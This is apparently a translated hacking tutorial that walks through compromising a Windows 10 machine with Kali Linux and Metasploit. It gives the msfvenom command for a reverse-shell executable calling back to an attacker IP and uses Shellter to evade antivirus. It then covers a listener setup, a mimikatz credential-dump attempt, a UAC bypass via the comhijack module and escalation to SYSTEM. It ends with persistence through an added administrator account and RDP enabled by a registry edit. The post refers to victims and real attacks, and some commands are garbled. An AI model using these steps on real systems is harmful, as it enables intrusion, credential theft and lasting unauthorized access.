In this article we will see how we can access a Windows 10 machine with Kali Linux and more specifically with Metasploit. We have talked about the Metasploit function in past. We have already installed Windows 10 in a virtual machine and we will try to gain access with an infected .exe file.
Create an infected .exe file
To create the executable .exe file, open your terminal and type the following command:
msfvenom -p windows / meterpreter / reverse_tcp -a x86 –platform windows -f exe LHOST = 192.168.100.4 LPORT = 4444 -o /root/something32.exe
So we will create a payload for Windows 10 machine, for 32-bit architecture.
To get our IP address, we use the ifconfig command inside Kali, defining the interface as eth0 (since we are on Ethernet):
The following screenshot shows the results of the command for the successful creation of the .exe file:
The next step is to make the executable .exe file we created, undetectable by security programs.
Making the FUD executable file
To make our file undetectable, we will use Shellter . Shellter simply changes the executable file signatures from a malicious to a completely new and unique file that can bypass its detection by Antivirus.
In Kali Linux, download Shellter with the following command:
sudo apt-get install shellter
To run Shellter, just type shellter in your terminal.
You will be prompted to enter the path to the executable file to make it FUD. Make sure you select the "Auto" mode as shown below.
Shellter will then perform some tests and ask you if you want to run the stealth function. Select "Y" for yes.
The next message that will appear will ask you to enter the payload and here we will put the file we created at the beginning with Msfvenom. You must select a list by typing "L" unless you want to proceed with your own custom payload. Select the payload to use. We need a Meterpreter_Reverse_TCP now, so we need to follow the "1" option
Type LHOST and LPORT and press Enter. Shellter will complete the process and ask you to press Enter.
At this point, our file has become undetectable by all antivirus and other security programs.
You could buy your own crypter that is constantly being upgraded and remains undetectable in the long run. Shellter will keep your file hidden for a while but at some point it will be added to the program lists and detected by antivirus.
Now we need to create a listener on the port we specified inside the executable file. We do this with Metasploit, using the msfconsole command on the Kali Linux terminal.
The following screenshot shows which commands to use in Metasploit. First, we will tell Metasploit to use the general payload handler "multi / handler" using the use multi / handler command. Next, we will configure the payload to match what is inside the executable file, using a set of payload commands windows / meterpreter / reverse_tcp. Next we will set LHOST and LPORT to the way we set LHOST 192.168.100.4 and LPORT 4444. When done, type “run” or “exploit” and press Enter.
If all goes well, the following snapshot will appear. The reverse TCP handler will have to wait for a connection.
The next step is to run the Windows executable file. How you serve it in a real attack on your victim is your problem and something we will not analyze now because we have already done it in the past…
Execution of Payload
So we transfer our file to Windows and run it.
Our file currently causes the payload to run and creates a connection to our attack machine (Kali Linux). Immediately, we get a Meterpreter session on Kali Linux. This is proved by Meterpreter message> as shown below:
Since the file was not executed as an "administrator", there are Meterpreter commands that cannot be executed as they would lead to an "access denied" response. This can be confirmed by running the getuid command, which tells us that we are running it as a l3s7r0z user.
To prove that the user does not have enough privileges, we tried to run the command mimikatz_command -f sekurlsa :: logonPasswords.
The result is a "Access is denied" message, as shown below:
To gain sufficient rights, we must bypass UAC. In the next step, we will see how this can be done.
The privilege escalation allows us to increase the privileges or rights (if you prefer) from a less privileged user (l3s7r0z) to a more privileged one, preferably the SYSTEM user, who has all the administrator rights.
Metasploit by default provides us with some methods that allow us to increase our privileges. In the Meterpreter command line, we use the getsystem command, as shown below:
Since all the methods used by the getsystem fail, we need an alternative method to increase our privileges.
We will use the comhijack exploit module to bypass user access control.
To do this, we leave our Meterpreter session in the background, change our exploit from multi / handler to windows / local / bypassuac_comhijack and apply this to the session we have in the background, using the SESSION 2 set.
Subsequently, we defined our payload in windows / x64 / meterpreter / reverse_tcp, LPORT and LHOST. Then we execute our exploit.
We successfully received a Meterpreter session. We can type "sysinfo" to see information about our target. Getuid shows us that we work as a l3s7r0z user in Windows 10, but we can upgrade to a SYSTEM user by running "getsystem".
We can see that our change was successful and we can confirm it by running the "getuid" command again. We can see that we are now NT AUTHORITYSYSTEM.
At this point we have full access to windows, we can get that data we want, such as passwords, various files that interest us, etc.
We will now see how we maintain the access we have to our victim even when the target decides to correct the vulnerability.
We will achieve this by activating RDP. In simple words we will have our own account within the target and we will activate the RDP so that whenever we want, we can connect to the machine and access the information we want.
In the Meterpreter session, we open the command shell to upload a Windows shell to our target (Windows 10).
In line C: WINDOWSsystem32>, we give the command net users. This lists all windows users. As we can see, there are only two users, the Administrator and the user l3s7r0z.
Add a new Jaime user and give him the password Bru73f0rc3_
The command used to do this is:
net user / add jaime Bru73f0rc3_
We then add Jaime to the group of administrators so that the account can perform administrator functions. The command we use is:
net localgroup administrators jaime / add
Then we add it to the RDP group. This will allow us to connect via RDP to the machine, even after the vulnerability has been fixed by antivirus programs.
The command we use is:
net localgroup “Remote Desktop Users” jaime / add
Once the configuration for Jaime is complete, we can use the following command to see the properties of the user:
net user jaime
The following snapshot shows the results of the command.
In some cases, RDP is not enabled on the victim machine. While we are in the shell, we can activate it by adding a registry key.
To enable RDP, use the following command:
reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server” / v fDenyTSConnections / t REG_DWORD / d 0 / f
If you want to disable RDP for any purpose, you can do so by typing the following command:
reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server” / v fDenyTSConnections / t REG_DWORD / d 1 / f
The result of operation shown below:
From Kali Linux, we can use the remmina remote client. If it is not installed in Kali, you can install it by typing the following command:
apt-get install remmina
Start remmina by typing remmina at the command prompt and logging in to the target using its IP address.
You will be prompted to accept one certificate. Do so and use the username and password you used to register your Jaime account. This is:
By default in Windows 10, the logged in user will be required uses Windows 10 to allow you to sign in. However, if they do not respond within 30 seconds, they are automatically logged out.